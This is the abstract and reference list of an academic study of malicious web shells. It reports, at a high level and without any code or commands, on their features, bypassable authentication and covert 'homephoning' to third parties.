No Honor Among Thieves: A Large-Scale Analysis of Malicious Web Shells

Web shells are malicious scripts that attackers upload to a compromised web server in order to remotely execute arbitrary commands, maintain their access, and elevate their privileges. Despite their high prevalence in practice and heavy involvement in security breaches, web shells have never been the direct subject of any study. In contrast, web shells have been treated as malicious blackboxes that need to be detected and removed, rather than malicious pieces of software that need to be analyzed and, in detail, understood. In this paper, we report on the first comprehensive study of web shells. By utilizing different static and dynamic analysis methods, we discover and quantify the visible and invisible features offered by popular malicious shells, and we discuss how attackers can take advantage of these features. For visible features, we find the presence of password bruteforcers, SQL database clients, portscanners, and checks for the presence of security software installed on the compromised server. In terms of invisible features, we find that about half of the analyzed shells contain an authentication mechanism, but this mechanism can be bypassed in a third of the cases. Furthermore, we find that about a third of the analyzed shells perform homephoning, i.e., the shells, upon execution, surreptitiously communicate to various third parties with the intent of revealing the location of new shell installations. By setting up honeypots, we quantify the number of third-party attackers benefiting from shell installations and show how an attacker, by merely registering the appropriate domains, can completely take over all installations of specific vulnerable shells.

[1]  Guo Xiaojun,et al.  Webshell detection techniques in web applications , 2014, Fifth International Conference on Computing, Communications and Networking Technologies (ICCCNT).

[2]  Wouter Joosen,et al.  You are what you include: large-scale evaluation of remote javascript inclusions , 2012, CCS.

[3]  Thorsten Holz,et al.  Simulation of Built-in PHP Features for Precise Static Code Analysis , 2014, NDSS.

[4]  Christopher Krügel,et al.  There Is No Free Phish: An Analysis of "Free" and Live Phishing Kits , 2008, WOOT.

[5]  Zhou Li,et al.  Understanding the Dark Side of Domain Parking , 2014, USENIX Security Symposium.

[6]  David Kesmodel,et al.  The Domain Game: How People Get Rich from Internet Domain Names , 2008 .

[7]  Dong-Hoon Yoo,et al.  WebSHArk 1.0: A Benchmark Collection for Malicious Web Shell Detection , 2015, J. Inf. Process. Syst..

[8]  A. Narayanan,et al.  OpenWPM : An automated platform for web privacy measurement , 2016 .

[9]  Andreas Terzis,et al.  A multifaceted approach to understanding the botnet phenomenon , 2006, IMC '06.

[10]  Jesse D. Kornblum Identifying almost identical files using context triggered piecewise hashing , 2006, Digit. Investig..

[11]  Davide Balzarotti,et al.  Behind the Scenes of Online Attacks: an Analysis of Exploitation Behaviors on the Web , 2013, NDSS.

[12]  Aurélien Francillon,et al.  The role of web hosting providers in detecting compromised websites , 2013, WWW '13.

[13]  Thorsten Holz A Short Visit to the Bot Zoo , 2005, IEEE Secur. Priv..